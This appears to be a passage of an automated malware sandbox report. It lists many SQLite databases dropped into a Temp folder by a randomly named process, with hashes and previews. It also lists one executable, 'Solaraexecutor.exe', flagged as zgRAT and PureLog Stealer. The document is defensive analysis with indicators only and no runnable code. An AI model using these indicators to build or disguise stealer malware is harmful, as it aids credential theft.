SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ol2WpQeT71

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\POIRH8aQdD

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PS6NWMt7Dm

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PapTOP9FFu

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PdX5Ytn7er

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Pphv4prXh0

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Q2wwF74h9d

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\QWp0k6hYaX

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Qg4fFsByZ6

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\QlZMIy3fQx

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Qle9Ol5hY6

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\R4Stj7Tqhj

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RRRcrC1qcB

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ryv29ZuD9m

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\S7YVq4d7qJ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\S7kOuRnKJg

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\SARjqUcZGU

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\SB3lNXsjqI

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\SStw47yJOJ

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Sln6Ai58a3

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe

Download File

Process:	C:\Users\user\Desktop\BootstrapperV1.19.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2241785
Entropy (8bit):	7.473760853524297
Encrypted:	false
SSDEEP:	24576:2TbBv5rUyXVahNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUn:IBJa+U5kzXDFrO0iTb0bzveEX99k
MD5:	B444FEC863C995EC2C4810FC308F08C2
SHA1:	F8F8CB40DAF8054A00FB7B3895BABD68C6429161
SHA-256:	E7CCCBE17462FBA64687EDDC141D99920AC3E890ED1464D17B6110FDCA6BE7DE
SHA-512:	1472D2A9E95C949A67734AF6849F827122A178DF799C7C29252CC0221437FB8573BCFF0A30E8F1D0E6AB1C39C8FE72C597F863BC192133A10CD6178BECC17127
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\SraSKjbzqw

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\SwBGQiWRor

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TPS85Q8ckC

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tani1nKTy7

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
